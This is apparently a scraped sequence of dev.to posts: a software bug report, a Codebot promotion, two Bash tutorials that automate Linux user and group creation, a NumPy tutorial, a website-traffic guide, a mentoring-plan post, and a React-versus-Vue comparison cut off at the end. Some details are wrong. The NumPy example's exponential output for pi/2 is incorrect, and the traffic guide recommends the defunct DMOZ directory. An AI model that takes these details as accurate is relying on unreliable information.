Scrape Any Website (SAW) promises to be a powerful tool for web data extraction. But as with any software, a keen eye can uncover areas for improvement. This blog post details my exploration of SAW, highlighting the bugs I encountered and suggesting potential solutions. ## Exploratory Testing: Delving into SAW's Functionalities My journey began with downloading SAW from the official Windows Store download page [SAW - Windows Store](https://apps.microsoft.com/detail/9mzxn37vw0s2?hl=en-gb&gl=GB). Launching the application, I familiarized myself with the interface, focusing on testing various features and pushing the app to its limits. My goal was to identify not just bugs, but also areas where usability could be enhanced. Bug Report: Unveiling the Cracks in the Facade My exploration yielded several noteworthy bugs. Here are a few of the most critical ones: **Missing Selectivity:** Let's say you only want to scrape data from a specific web page. Unfortunately, the current version of SAW doesn't allow you to select individual URLs for scraping. Instead, it scrapes all URLs associated with a website. This can be a major roadblock if you're only interested in a specific data set. **Unresponsive UI Elements :** Hovering over the some options resulted in no visual change, unlike other interactive elements. This inconsistency can lead to user confusion, making it unclear if the option is functional. Implementing consistent hover effects would improve the user experience. **Inoperable Settings:** The settings menu within SAW offered configuration options for browsers, but lacked a crucial "Save" button. Without this functionality, any adjustments made are lost upon closing the application. A prominent "Save" button is essential to ensure user-defined settings persist. **Dashboard Disconnect:** The main dashboard seems to be grappling with a communication gap. Jobs and URLs added to scrape jobs don't always reflect on the dashboard, leaving you uncertain about the progress or presence of your data. **Information Blackout**: Obtaining basic information about the software itself, like the version number, proved to be a challenge. Additionally, there's no built-in help section or FAQ to guide users through potential issues. ## Beyond Bug Hunting: Suggestions for Improvement While bug fixing is vital, I believe SAW has the potential to be even more user-friendly. Here are some additional suggestions: **Informative Dashboard:** The main dashboard currently displays limited information. Highlighting the number of URLs added, scrape status, and extracted data would provide valuable insights at a glance. **Accessibility Features:** Integrating features like software version information and a dedicated Help section with FAQs would empower users to troubleshoot independently and stay informed. **Granular URL Selection:** The ability to choose specific URLs within a scrape job would empower users to target their data collection precisely. Enhanced User Interface: Incorporating hover highlights and other visual cues can significantly improve the application's user-friendliness and intuitiveness. **Real-Time Dashboard Updates:** A dynamic and responsive dashboard that reflects changes made within the application would provide valuable feedback to users and eliminate confusion. ## Conclusion: A Work in Progress SAW presents a promising solution for web data extraction. By addressing the identified bugs and incorporating the suggested improvements, SAW can evolve into a powerful and user-friendly tool. This experience has solidified the importance of thorough testing in software development. For a detailed exploration of the bugs I encountered, you can access my comprehensive bug report [SAW BUG Report.xlsx](https://1drv.ms/x/s!Ajr0qU-KpaKWvWLdIokc8WhBk8T3?e=Luuim7). Additionally, to download SAW and embark on your own data scraping adventures, visit the official [Scrape Any Website] (https://scrapeanyweb.site/) or the [Windows Store](https://apps.microsoft.com/detail/9mzxn37vw0s2?hl=en-gb&gl=GB).
marg4cf3553b4099
1,909,029
## Supercharge Your Coding with Codebot: An AI-Powered Assistant 🚀
Hello Dev.to community! 👋 I'm excited to introduce Codebot, an AI-driven code assistant designed to...
0
2024-07-02T14:13:26
https://dev.to/aviralgarg05/-supercharge-your-coding-with-codebot-an-ai-powered-assistant-2l0a
javascript, github, ai, llm
Hello Dev.to community! 👋 I'm excited to introduce **[Codebot](https://github.com/aviralgarg05/Codebot)**, an AI-driven code assistant designed to enhance your coding experience. Let's dive into what makes Codebot so awesome and how it can help you write better code faster. ### What is Codebot? 🤖 Codebot is a powerful tool that leverages Large Language Models (LLMs) to understand and generate code. Here’s a quick rundown of its core features: - **Code Completion**: It predicts and completes code snippets based on the current context, saving you time and reducing syntax errors. - **Code Generation**: Need a specific function or code block? Just give Codebot a prompt, and it will generate the necessary code for you. - **Multi-Language Support**: Whether you’re working with Python, JavaScript, or another language, Codebot has got you covered. - **IDE Integration**: Seamlessly integrates with popular Integrated Development Environments (IDEs) for a smooth coding experience. - **AI-Powered Suggestions**: Utilizes cutting-edge machine learning models to provide intelligent and context-aware code suggestions. ### Why Codebot is Cool 😎 - **Boosts Productivity**: Automates repetitive tasks and boilerplate code generation, allowing you to focus on more complex parts of your project. - **Reduces Errors**: Helps minimize syntax and logical errors with smart suggestions, leading to more reliable and maintainable code. - **Supports Learning**: Acts as a fantastic learning aid for beginners, offering instant feedback and coding best practices. - **AI-Powered**: Constantly improves and adapts to your coding style, providing increasingly accurate and relevant suggestions. ### Integration with MindsDB 🧠 Codebot integrates seamlessly with **MindsDB**, an open-source machine learning platform, to enhance its predictive capabilities. This powerful combination ensures that you get the most accurate and contextually appropriate code suggestions. --- Vote for my project on [quira](https://quira.sh/repo/aviralgarg05-Codebot-822485863?utm_source=copy&utm_share_context=rdp) and show support to the project Check out the [Codebot GitHub repository](https://github.com/aviralgarg05/Codebot) to start supercharging your coding workflow today! Happy coding! 🎉 ---
aviralgarg05
1,909,028
Automating User Account Management in Linux with a Bash Script
User Management is an integral part of a Sys Ops Engineer, as this is useful in day-to-day activity....
0
2024-07-02T14:12:40
https://dev.to/hollyphat/automating-user-account-management-in-linux-with-a-bash-script-248n
automation, hng11, bash
User Management is an integral part of a Sys Ops Engineer, as this is useful in day-to-day activity. This is usually required when onboarding new members of staff. In this piece, we will go through the process of creating and assigning new users. This is part of HNG Internship requirements. You can learn more about HNG by clicking on the link below. [HNG Internship](https://hng.tech/internship) ## Premise Manually handling user accounts can be tedious and often leads to mistakes. To make things easier and more reliable, we should automate this process. We'll create a script called "create_users.sh" that will read a list of usernames and groups from a given text file, create the users and groups, set up their home directories, generate random passwords, and log everything to a management.log file. This will save time, reduce errors, and keep things consistent. ## Prerequisites The following are the requirements needed to create and execute the script - Basic Knowledge of Linux command - Admin privilege - Text editor e.g Vim, Nano, TextEdit, etc ## Overview The script is expected to perform the following tasks 1. Reads a list of users and groups from any given text file. 2. Creates users and assigns them to specified groups. 3. Set up home directories with appropriate permissions. 4. Generates random passwords for the users. 5. Logs all actions to `/var/log/user_management.log.` 6. Stores the generated passwords securely in `/var/secure/user_passwords.csv`. ## Procedure - Define the variable to accept the input file, log file and password file ``` INPUT_FILE="$1" USER_INPUT_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" ``` - Create functions to perform tasks ``` # Function to log messages log_message() { echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" | sudo tee -a $USER_INPUT_FILE > /dev/null } # Function to generate random password random_password() { < /dev/urandom tr -dc 'A-Za-z0-9' | head -c 12 } ``` - Create directories, and files and give permissions ``` # Create neccessary directories if they do not exist sudo mkdir -p /var/log sudo mkdir -p /var/secure # create log file if it does not exist, and set the neccessary permission sudo touch $USER_INPUT_FILE sudo chmod 600 $USER_INPUT_FILE # create password file if it does not exist, and set the neccessary permission sudo touch $PASSWORD_FILE sudo chmod 600 $PASSWORD_FILE ``` - The code below read the file line by line, create the user, add to group and set password ``` # Read the input file line by line while IFS=';' read -r username groups; do # Remove whitespace from username and group username=$(echo $username | xargs) groups=$(echo $groups | xargs) # Create the new user if id -u "$username" >/dev/null 2>&1; then log_message "User $username already exists. Creation skipped." else sudo useradd -m -s /bin/bash "$username" if [ $? -eq 0 ]; then log_message "New user: $username created successfully." else log_message "Unable to create user: $username." continue fi fi # Create the new user personal group if ! getent group "$username" >/dev/null 2>&1; then sudo groupadd "$username" log_message "Personal group $username created successfully" fi # Add user to group sudo usermod -aG "$username" "$username" # Add the user to other groups IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo $group | xargs) # Remove whitespace if ! getent group "$group" >/dev/null 2>&1; then sudo groupadd "$group" log_message "Group $group created." fi sudo usermod -aG "$group" "$username" log_message "User $username added to group: $group." done # Generate a random password and set it for the created user password=$(random_password) echo "$username:$password" | sudo chpasswd echo "$username,$password" | sudo tee -a $PASSWORD_FILE > /dev/null log_message "Password set for user $username." done < "$INPUT_FILE" ``` - Log message to show the status after execution ``` log_message "User creation script completed." echo "User creation process is complete. Check $USER_INPUT_FILE for details" ``` ## Conclusion Using a bash script to automate user account management can greatly simplify the onboarding process for new employees, users, or accounts. By following the steps outlined in this article, you can create an effective script that ensures users are created, added to groups, and provided with secure passwords, all while logging actions for transparency and audit purposes. This tutorial is made possible by [HNG](https://hng.tech/hire). You can find the bash code [https://github.com/hollyphat/Hng11-Stage-1](https://github.com/hollyphat/Hng11-Stage-1).
hollyphat
1,909,025
A Comprehensive Guide to NumPy with Python 🐍🎲
NumPy, short for Numerical Python, is a fundamental package for scientific computing in Python. It...
0
2024-07-02T14:09:05
https://dev.to/kammarianand/a-comprehensive-guide-to-numpy-with-python-2mc9
python, numpy, datascience, beginners
NumPy, short for Numerical Python, is a fundamental package for scientific computing in Python. It provides support for arrays, matrices, and many mathematical functions. If you're working with data in Python, understanding NumPy is essential. In this post, we'll explore the basics of NumPy and dive into various examples to illustrate its capabilities. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hfzvur5b5ll6kzum2ze5.jpeg) ## </> Installation Before we get started, ensure that NumPy is installed. You can install it using pip: ```bash pip install numpy ``` ## Basics of NumPy ### Importing NumPy To use NumPy, you need to import it. The convention is to import it as `np`: ```python import numpy as np ``` ### Creating Arrays NumPy arrays are the main way to store data. You can create arrays using the `array` function: ```python # Creating a 1D array arr1 = np.array([1, 2, 3, 4, 5]) print("1D Array:", arr1) # Creating a 2D array arr2 = np.array([[1, 2, 3], [4, 5, 6]]) print("2D Array:\n", arr2) ``` **Output:** ``` 1D Array: [1 2 3 4 5] 2D Array: [[1 2 3] [4 5 6]] ``` ### Array Operations NumPy arrays support a variety of operations, such as element-wise addition, subtraction, multiplication, and division. ```python arr1 = np.array([1, 2, 3]) arr2 = np.array([4, 5, 6]) # Element-wise addition sum_arr = arr1 + arr2 print("Sum:", sum_arr) # Element-wise multiplication prod_arr = arr1 * arr2 print("Product:", prod_arr) ``` **Output:** ``` Sum: [5 7 9] Product: [ 4 10 18] ``` ### Array Slicing Just like lists in Python, NumPy arrays can be sliced. ```python arr = np.array([1, 2, 3, 4, 5, 6]) # Slicing elements from index 2 to 4 sliced_arr = arr[2:5] print("Sliced Array:", sliced_arr) ``` **Output:** ``` Sliced Array: [3 4 5] ``` ## Advanced Features of NumPy ### Mathematical Functions NumPy provides a wide range of mathematical functions. ```python arr = np.array([0, np.pi/2, np.pi]) # Sine function sin_arr = np.sin(arr) print("Sine:", sin_arr) # Exponential function exp_arr = np.exp(arr) print("Exponential:", exp_arr) ``` **Output:** ``` Sine: [0.000000e+00 1.000000e+00 1.224647e-16] Exponential: [ 1. 1.64872127 23.14069263] ``` ### Statistical Functions NumPy includes a variety of statistical functions. ```python arr = np.array([1, 2, 3, 4, 5]) # Mean mean_val = np.mean(arr) print("Mean:", mean_val) # Standard Deviation std_val = np.std(arr) print("Standard Deviation:", std_val) ``` **Output:** ``` Mean: 3.0 Standard Deviation: 1.4142135623730951 ``` ### Linear Algebra NumPy has robust support for linear algebra operations. ```python arr1 = np.array([[1, 2], [3, 4]]) arr2 = np.array([[5, 6], [7, 8]]) # Matrix multiplication mat_mul = np.dot(arr1, arr2) print("Matrix Multiplication:\n", mat_mul) ``` **Output:** ``` Matrix Multiplication: [[19 22] [43 50]] ``` ### Random Module NumPy’s random module can be used to generate random numbers. ```python # Generate a 3x3 array of random numbers random_arr = np.random.random((3, 3)) print("Random Array:\n", random_arr) ``` **Output:** ``` Random Array: [[0.5488135 0.71518937 0.60276338] [0.54488318 0.4236548 0.64589411] [0.43758721 0.891773 0.96366276]] ``` ## Conclusion NumPy is a powerful library for numerical computations in Python. It provides efficient storage and manipulation of data, making it an essential tool for data science and machine learning. The examples above just scratch the surface of what NumPy can do. I encourage you to explore more and utilize NumPy in your data projects. Feel free to ask questions or share your experiences with NumPy in the comments below! --- About Me: 🖇️<a href="https://www.linkedin.com/in/kammari-anand-504512230/">LinkedIn</a> 🧑‍💻<a href="https://www.github.com/kammarianand">GitHub</a>
kammarianand
1,909,024
React VS Vue | HNG internship
Introduction React and Vue are two of the most popular JavaScript frameworks. Both have unique...
0
2024-07-02T14:08:30
https://dev.to/clarenceg01/react-vs-vue-hng-internship-209e
webdev, react, javascript, programming
**Introduction** React and Vue are two of the most popular JavaScript frameworks. Both have unique strengths and weaknesses and choosing either of the two to use in a project can be difficult. This article aims to help developers make an informed choice. **React** React is a JavaScript library developed and maintained by Facebook. It focuses on building user interfaces, especially for single-page applications. React is known for its virtual DOM, component-based architecture that enables re-usability and unidirectional data flow. **Vue** Vue is a progressive JavaScript framework created by Evan You. Vue is designed to be incrementally adoptable and can scale between a library and a full-fledged framework depending on your needs. It emphasizes simplicity and flexibility, with a core library focusing on the view layer and an ecosystem of supporting libraries for more advanced features. **Comparison Between React and Vue: Which to Pick** When deciding between React and Vue for your next project, it's essential to consider their core differences and strengths. React, developed by Facebook, offers a robust and flexible ecosystem, making it ideal for large-scale applications that require complex state management and frequent updates. Its use of JSX and emphasis on a component-based architecture appeal to developers who prefer a functional programming approach. Conversely, Vue, created by Evan You, stands out for its simplicity and ease of integration, featuring an HTML-based template syntax that is more intuitive for beginners and a gentler learning curve. Vue's cohesive ecosystem, including Vuex for state management, makes it a great choice for small to medium-sized projects where rapid development and ease of use are priorities. Ultimately, your choice should depend on your specific project requirements, team expertise, and long-term maintenance goals, with React being more suitable for larger, more complex applications, and Vue being a better fit for smaller, more straightforward projects. **Conclusion** In summary, both React and Vue are formidable front-end frameworks, each with its distinct features and benefits. Understanding their respective strengths and limitations allows for an informed decision on the best tool for your next web development project. As I begin the HNG 11 internship, I am eager to explore React further and utilize its capabilities to create high-quality solutions. My aim is to maximize this opportunity, gain valuable experience, and achieve exceptional results throughout this year's internship. **HNG 11** HNG internship is a coding internship for intermediate developers, designers, and editors. It's a fantastic opportunity to put my skills to the test and work under pressure. I've enrolled in the frontend stack, which means I'll be working with React, preparing me for complex application development in the future. I'm thrilled about this opportunity and looking forward to participating and reaching the final stage of this year's HNG internship. Check out [HNG website](https://hng.tech/internship) to join the HNG11 internship You can also subscribe to [HNG Premium](https://hng.tech/premium) and have special access to more updates and jobs!
clarenceg01
1,909,023
How to Drive Traffic to Your Website
How to Drive Traffic to Your Website: A Comprehensive Guide Driving traffic to your...
0
2024-07-02T14:07:39
https://dev.to/sh20raj/how-to-drive-traffic-to-your-website-3m68
webdev, javascript, beginners, programming
### How to Drive Traffic to Your Website: A Comprehensive Guide Driving traffic to your website is crucial for increasing brand awareness, generating leads, and achieving your business goals. With so many platforms and strategies available, it's essential to utilize a combination of methods to attract visitors effectively. In this article, we will explore various websites and platforms that can help you drive traffic to your site. > Ad. > {% youtube https://www.youtube.com/watch?v=wUVQ0yHZ1SU %} #### 1. **Search Engines** **Google**: The king of search engines. By optimizing your website for search engines (SEO), you can improve your visibility in Google’s search results. This involves using relevant keywords, creating high-quality content, and building backlinks. **Bing**: Although less popular than Google, Bing can still drive significant traffic. Implement SEO techniques similar to those used for Google to rank on Bing. #### 2. **Social Media Platforms** **Facebook**: Create a business page and regularly post engaging content. Join groups related to your industry and participate in discussions. Use Facebook Ads to target specific demographics and boost your visibility. **Twitter**: Engage with your followers by sharing interesting content, using hashtags, and participating in trending topics. Twitter Ads can also help you reach a larger audience. **Instagram**: Share visually appealing content and use features like stories and reels to increase engagement. Utilize relevant hashtags to reach a broader audience. **LinkedIn**: Post professional content and articles, join industry-related groups, and network with professionals. LinkedIn Ads can help you target specific professional demographics. **Pinterest**: Share images and infographics related to your niche. Pinterest is particularly effective for driving traffic to blogs and e-commerce sites. #### 3. **Content Sharing Platforms** **Medium**: Write and publish articles on Medium to reach its large audience. Medium’s algorithm can help your content get discovered by users interested in your topics. **Quora**: Answer questions related to your industry and provide valuable insights. Include links to your website where relevant. **Reddit**: Participate in relevant subreddits and share your content where appropriate. Be sure to follow subreddit rules and avoid self-promotion unless it’s allowed. **Slideshare**: Upload presentations related to your industry. Slideshare can drive traffic by showcasing your expertise and linking back to your website. #### 4. **Online Communities and Forums** **Stack Overflow**: Answer technical questions and showcase your expertise. Include links to your website in your profile and answers where appropriate. **Product Hunt**: Launch new products on Product Hunt to gather feedback and attract early adopters. **Hacker News**: Share tech-related news and articles. Engage with the community to build your reputation and drive traffic to your site. #### 5. **Content Aggregators and Bookmarking Sites** **Flipboard**: Curate and share content to attract readers interested in your topics. **Mix (formerly StumbleUpon)**: Share interesting content to gain visibility and drive traffic. **Pocket**: Save and share articles. Users can discover your content through Pocket’s recommendations. #### 6. **Video Platforms** **YouTube**: Create and share videos related to your niche. Include links to your website in the video descriptions and use YouTube’s features to engage with viewers. **Vimeo**: Share high-quality videos with a professional audience. Vimeo’s community can help drive targeted traffic to your site. #### 7. **Email Marketing** **Mailchimp**: Build and manage email lists, create engaging newsletters, and send targeted email campaigns to drive traffic to your website. **Sendinblue**: Use Sendinblue to create email campaigns, automate your email marketing, and track results to optimize your strategy. #### 8. **Advertising Networks** **Google Ads**: Use pay-per-click advertising to appear in Google’s search results and drive targeted traffic to your website. **Facebook Ads**: Create targeted ad campaigns on Facebook and Instagram to reach specific demographics. **LinkedIn Ads**: Advertise to professionals on LinkedIn to drive traffic from a targeted professional audience. **Twitter Ads**: Promote tweets and accounts to increase your visibility on Twitter. #### 9. **Affiliate Marketing** **CJ Affiliate**: Partner with affiliates to promote your website and drive traffic through affiliate marketing. **ShareASale**: Join a network of affiliates to increase your reach and drive more traffic to your site. #### 10. **Guest Blogging** Write guest posts for reputable blogs in your industry. This can help you gain exposure, build backlinks, and drive traffic to your website. #### 11. **Influencer Marketing** Collaborate with influencers who have a large following in your niche. Influencers can help promote your website to their audience, driving traffic and increasing brand awareness. #### 12. **Web Directories** **DMOZ**: Submit your site to the Open Directory Project to increase your visibility and drive traffic. **Yelp**: For local businesses, maintain a profile and gather reviews to attract local traffic. #### 13. **Online Marketplaces** **Amazon**: If applicable, sell products on Amazon to drive traffic to your website. Use Amazon’s advertising features to increase your visibility. **Etsy**: For handmade or unique products, use Etsy to reach a larger audience and drive traffic to your site. ### Conclusion Driving traffic to your website requires a multi-faceted approach. By utilizing search engines, social media platforms, content sharing platforms, online communities, email marketing, advertising networks, affiliate marketing, guest blogging, influencer marketing, web directories, and online marketplaces, you can effectively increase your website’s visibility and attract more visitors. Monitor your traffic sources regularly and adjust your strategies to find the most effective methods for your site.
sh20raj
1,909,020
Automating Linux User Creation with Bash Script
Managing users and groups on a Linux system can be a complex and time-consuming task, especially in...
0
2024-07-02T14:03:07
https://dev.to/codereaper0/automating-linux-user-creation-with-bash-script-3p3
Managing users and groups on a Linux system can be a complex and time-consuming task, especially in environments with frequent changes. Automation can significantly simplify this process, ensuring consistency and saving valuable time. In this article, we will walk through the implementation of a Bash script that automates the creation of users and groups, sets up home directories, generates secure random passwords, and logs all actions for auditing purposes. ## **Script Overview** The Bash script create_users.sh reads a list of usernames and groups from a text file, creates the specified users and groups, sets up home directories with appropriate permissions, generates random passwords for the users, and logs all actions. The script also securely stores the generated passwords in a dedicated file. ## **Script Breakdown** Here is the complete create_users.sh script, followed by a detailed explanation of each section: ``` #!/bin/bash # Ensure the script is run with root privileges if [ "$EUID" -ne 0 ]; then echo "Please run as root" exit 1 fi # Log file path LOG_FILE="/var/log/user_management.log" # Password storage file path PASSWORD_FILE="/var/secure/user_passwords.csv" # Create secure directory for passwords if it doesn't exist mkdir -p /var/secure chmod 700 /var/secure # Function to create groups create_groups() { local groups="$1" IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) # Remove leading/trailing whitespace if [ ! -z "$group" ]; then if ! getent group "$group" > /dev/null; then groupadd "$group" echo "Group '$group' created." | tee -a "$LOG_FILE" fi fi done } # Function to create user and group create_user() { local username="$1" local groups="$2" # Create user group if it doesn't exist if ! getent group "$username" > /dev/null; then groupadd "$username" echo "Group '$username' created." | tee -a "$LOG_FILE" fi # Create the additional groups create_groups "$groups" # Create user with personal group and home directory if user doesn't exist if ! id "$username" > /dev/null 2>&1; then useradd -m -g "$username" -G "$groups" "$username" echo "User '$username' created with groups '$groups'." | tee -a "$LOG_FILE" # Set home directory permissions chmod 700 "/home/$username" chown "$username:$username" "/home/$username" # Generate random password password=$(openssl rand -base64 12) echo "$username:$password" | chpasswd echo "$username,$password" >> "$PASSWORD_FILE" else echo "User '$username' already exists." | tee -a "$LOG_FILE" fi } # Read the input file input_file="$1" if [ -z "$input_file" ]; then echo "Usage: $0 <name-of-text-file>" exit 1 fi # Ensure the input file exists if [ ! -f "$input_file" ]; then echo "File '$input_file' not found!" exit 1 fi # Process each line of the input file while IFS=';' read -r user groups; do user=$(echo "$user" | xargs) # Remove leading/trailing whitespace groups=$(echo "$groups" | xargs) # Remove leading/trailing whitespace if [ ! -z "$user" ]; then create_user "$user" "$groups" fi done < "$input_file" # Set permissions for password file chmod 600 "$PASSWORD_FILE" echo "User creation process completed." | tee -a "$LOG_FILE" ``` ## Detailed Explanation **Ensuring Root Privileges** The script starts by checking if it is being run with root privileges, as creating users and modifying system files require administrative rights. ``` if [ "$EUID" -ne 0 ]; then echo "Please run as root" exit 1 fi ``` **Setting Up Log and Password Files The script defines paths for the log file and the password storage file. It then creates a secure directory for storing passwords and ensures it has the correct permissions. ``` LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" mkdir -p /var/secure chmod 700 /var/secure ``` **Function to Create Groups The create_groups function takes a comma-separated list of groups and creates each group if it does not already exist. It also logs the creation of each group. ``` create_groups() { local groups="$1" IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) if [ ! -z "$group" ]; then if ! getent group "$group" > /dev/null; then groupadd "$group" echo "Group '$group' created." | tee -a "$LOG_FILE" fi fi done } ``` **Function to Create Users and Groups The create_user function handles the creation of the user and their primary group, as well as any additional groups. It sets up the user's home directory, assigns appropriate permissions, and generates a random password for the user. ``` create_user() { local username="$1" local groups="$2" if ! getent group "$username" > /dev/null; then groupadd "$username" echo "Group '$username' created." | tee -a "$LOG_FILE" fi create_groups "$groups" if ! id "$username" > /dev/null 2>&1; then useradd -m -g "$username" -G "$groups" "$username" echo "User '$username' created with groups '$groups'." | tee -a "$LOG_FILE" chmod 700 "/home/$username" chown "$username:$username" "/home/$username" password=$(openssl rand -base64 12) echo "$username:$password" | chpasswd echo "$username,$password" >> "$PASSWORD_FILE" else echo "User '$username' already exists." | tee -a "$LOG_FILE" fi } ``` **Processing the Input File The script reads the input file provided as a command-line argument. Each line of the file is expected to contain a username and a list of groups separated by a semicolon. The script processes each line, removing any leading or trailing whitespace, and calls the create_user function. ``` input_file="$1" if [ -z "$input_file" ]; then echo "Usage: $0 <name-of-text-file>" exit 1 fi if [ ! -f "$input_file" ]; then echo "File '$input_file' not found!" exit 1 fi while IFS=';' read -r user groups; do user=$(echo "$user" | xargs) groups=$(echo "$groups" | xargs) if [ ! -z "$user" ]; then create_user "$user" "$groups" fi done < "$input_file" ## ``` Finalizing Permissions Finally, the script ensures that the password file has the correct permissions, making it readable only by the root user. ``` chmod 600 "$PASSWORD_FILE" echo "User creation process completed." | tee -a "$LOG_FILE" ``` ## Running the Script To run the create_users.sh script, follow these steps: 1. **Create the Input File: **Prepare a text file with usernames and groups. Each line should contain a username followed by a semicolon and a comma-separated list of groups. For example: ``` tella;admins,developers boluwatife;users,admins ``` 2. **Make the Script Executable:** Ensure the script has executable permissions. ``` chmod +x create_users.sh ``` 3. **Run the Script with Root Privileges:** Execute the script, passing the path to the input file as an argument. ``` sudo ./create_users.sh /path/to/input_file.txt ``` ## Conclusion This script provides a robust solution for automating user and group management on a Linux system. It ensures that all actions are logged for auditing purposes and that generated passwords are stored securely. By following the steps outlined in this article, you can customize and extend the script to meet your specific needs, improving efficiency and consistency in user management tasks [Link to Github repository](https://github.com/codeReaper0/hng11-devops-stage1) If you're curious about the [HNG Internship](https://hng.tech/internship), check out their website. And if you're looking to hire developers, head over to [HNG Hire](https://hng.tech/hire).
codereaper0
1,905,141
writing my first mentoring plan
I've recently got into a career mentoring program with my local JuniorDev community which runs for 2...
0
2024-07-02T14:02:58
https://dev.to/ohchloeho/writing-my-first-mentoring-plan-1bpo
career, mentorship, networking
I've recently got into a career mentoring program with my local JuniorDev community which runs for 2 months with check-ins every 2 weeks. Being a mentee, I thought it would be helpful for both my mentors and I to list what I want to learn from them and what I want to achieve at the end of the program. ## 1. Embodying the right mindset As an IT engineer who have worked on developing and maintaining several systems for my organization, I frequently come across the questions of "How will this help us more than hurt us?" and "Should we do this just because we can?" which returns us to the drawing board of whether a certain implementation would cause more problems than the ones it will be solving. I've realised that I tend to lose focus and clarity of the problem at hand since distractions are everywhere nowadays. I want to build a mindset that focuses on solving one problem and delivering a solution fast, followed by reiteration practices to make it better and better. ## 2. Interview and Workforce preparations Throwing interview prep into the mix, I do lack quite a lot of knowledge about workflows such as scrum or agile, Kanban boards, etc even though I have been working with a few workflows on Jira project boards. I've read that good CI/CD practices are just as important as practicing LeetCode since working with other developers makes up most of the job. ## 3. Make a decision on the work I want to do / specialise in As I am someone with plenty of interests, I'm hoping to get some advice on the field of software to be involved in. I'm going to list several of my current interests in tech here based on their priorities: - Writing programs with GO - Web-app and application development - tinkering with IoT devices, Raspberry Pi, ESP32, etc. Tech stacks I'm most familiar with: - JavaScript - React - GO I am intending to specialize in application development as the entry for jobs in the field are slightly more open for Junior positions whereas a certain specialization surround my interests such as backend development would require higher levels of experience that I currently don't have. Let me know what you think about this in the comments and if you have any idea what I should try specializing in! I will be starting the mentorship program in a weeks' time, and I hope to be updating my progress here as well. If you have any advice on mentorships for me, please let me know in the comments as well :)
ohchloeho
1,881,459
Are you a Beginner, Intermediate or Expert Programmer?
That is a good question is it not? That is something I have been struggling to figure out. I have...
0
2024-07-02T14:00:00
https://dev.to/anitaolsen/are-you-a-beginner-intermediate-or-expert-programmer-2p8m
discuss
That is a good question is it not? That is something I have been struggling to figure out. I have been wondering for a while if I am still a beginner or at least moving towards being intermediate? I am pretty sure I am not an expert as many things are still very difficult for me (if not too difficult?!) and I feel at times like I know nothing at all 😅 Are you a beginner, intermediate or expert programmer? And how do you know that?
anitaolsen
1,909,019
Comparing ReactJS and Vue.js: A Comprehensive Guide
In the ever-changing world of web development, choosing the correct front-end technology can be...
0
2024-07-02T13:58:09
https://dev.to/nicholchuks/comparing-reactjs-and-vuejs-a-comprehensive-guide-5a4a
In the ever-changing world of web development, choosing the correct front-end technology can be critical to a project's success. ReactJS and Vue.js have become two of the most well-liked and potent JavaScript frameworks out of all accessible options. The purpose of this post is to assist developers in making informed decisions by comparing ReactJS vs Vue.js and emphasizing their advantages, disadvantages, and use cases. ## Overview **ReactJS** Facebook created and maintains the ReactJS JavaScript library, which is used to create user interfaces, especially for single-page apps. Since its 2013 release, it has experienced tremendous growth in popularity thanks to its virtual DOM, component-based architecture, and one-way data binding. **Vue.js** Evan You developed the open-source JavaScript framework Vue.js, which is used to construct user interfaces and single-page apps. Vue.js, which was released in 2014, is renowned for being progressive, flexible, and easy to use, enabling developers to integrate it gradually. ## Core Differences **Learning Curve** - ReactJS: When compared with Vue, React has a higher learning curve. Understanding ES6+ features, JSX (a syntax extension for JavaScript), and ideas like state management using Redux or Context API is necessary. - Vue.js: Vue is well known for having a low learning curve. It is easy to use and blends in nicely with conventional web technology. The official material is thorough and easy to understand for newcomers. **Architecture** - ReactJS: React divides the user interface into reusable components and uses a component-based architecture. To describe the UI, it makes extensive use of JSX and JavaScript. - Vue.js: Vue takes a more flexible approach while still using a component-based architecture. Developers with traditional web development expertise may find it more comfortable as Vue templates are developed using HTML-based syntax. **State Management** - ReactJS: In order to properly manage application state, state management in React can be complicated and frequently calls for extra libraries like Redux, MobX, or the Context API. - Vue.js: Vue comes with an integrated state management system called Vuex that works well with the framework. Vuex makes state management easier by giving all components access to a single store. **Performance** - ReactJS: React achieves great efficiency by rendering only the components that change and updating its virtual DOM effectively. However, the application's architecture and optimization can have an impact on performance. - Vue.js: Similar to React in terms of efficiency, Vue likewise makes use of a virtual DOM. Like React, Vue's reactivity mechanism depends on how it is implemented, however, it is a very efficient system overall. **Ecosystem and Community** - ReactJS: A wide range of libraries, tools, and extensions are available inside the React ecosystem. Its sizable and vibrant community adds to an abundance of tutorials, third-party integrations, and resources. - Vue.js: While not as large as React's, Vue's ecosystem is expanding quickly. An extensive toolkit is included with Vue CLI, Vue Router, and Vuex right out of the box. With a wealth of lessons and documentation, the community is vibrant and helpful. **Strengths of ReactJS** 1. Mature Ecosystem: React is suited for complex and extensive applications because of its mature ecosystem, which offers a huge selection of tools, libraries, and extensions. 2. Strong Community Support: Third-party integrations, an abundance of tools, and ongoing developments are all made possible by React's sizable community. 3. Flexibility: React's adaptability gives developers greater control over the development process by enabling them to select the tools and libraries of their choice. 4. Performance: Excellent performance is a result of the virtual DOM and an effective diffing method, particularly in large applications. **Strengths of Vue.js** 1. Ease of Learning: Both novice and seasoned developers can easily learn Vue thanks to its modest learning curve and comprehensive documentation. 2. Integrated Solutions: Vue streamlines the development process with integrated solutions like Vuex for state management and Vue Router for routing. 3. Flexibility: Without requiring a total rebuild, developers may incorporate Vue into already-existing projects by using it incrementally. 4. Readable Syntax: The code is easier to comprehend and maintain because to Vue's HTML-based syntax and distinct concern separation. **Use Cases** - ReactJS is the best choice for complicated state management in large-scale applications, such as social media networks, e-commerce websites, and enterprise-level apps. - Vue.js: Ideal for prototypes, smaller- to medium-sized projects, and apps where ease of integration and rapid development are critical. **Conclusion** ReactJS and Vue.js are two powerful frontend technologies, each possessing distinct advantages and disadvantages. Vue's simplicity and integrated solutions make it a great choice for smaller projects and speedy development, while React's extensive ecosystem and flexibility make it appropriate for large and complicated applications. The decision between ReactJS and Vue.js ultimately comes down to the particular needs of the project, the team's level of knowledge of the respective technologies, and the type of development experience that is wanted. Developers may make well-informed judgments that are in line with the goals and objectives of their projects by knowing the key distinctions and advantages of each framework. Check out HNG Internship if you want to accelerate your development path; they provide a fast-paced program where you 